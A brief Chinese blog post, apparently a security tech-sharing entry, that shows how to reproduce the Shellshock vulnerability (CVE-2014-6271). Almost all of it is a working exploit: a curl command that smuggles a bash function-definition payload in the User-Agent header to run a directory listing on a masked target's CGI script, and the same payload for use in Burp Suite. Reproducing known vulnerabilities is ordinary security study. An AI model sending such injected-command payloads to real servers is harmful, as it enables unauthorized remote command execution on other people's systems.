破壳漏洞（CVE-2014-6271）

技术分享

发布日期: 2019-10-14

更新日期: 2019-10-14

文章字数: 46

阅读时长: 1 分

阅读次数:

linux下可以直接使用curl进行复现，命令如下

curl -A ' () { :;};echo ;  echo $(/bin/ls /);' 'http://www.*****.com/cgi-bin/poc.cgi'

Windows下可使用Burp Suite

将User-Agent改为() { :;};echo ; echo $(/bin/ls /);

漏洞复现

2019-10-15 技术分享

文件包含

2019-10-12 技术分享

sql注入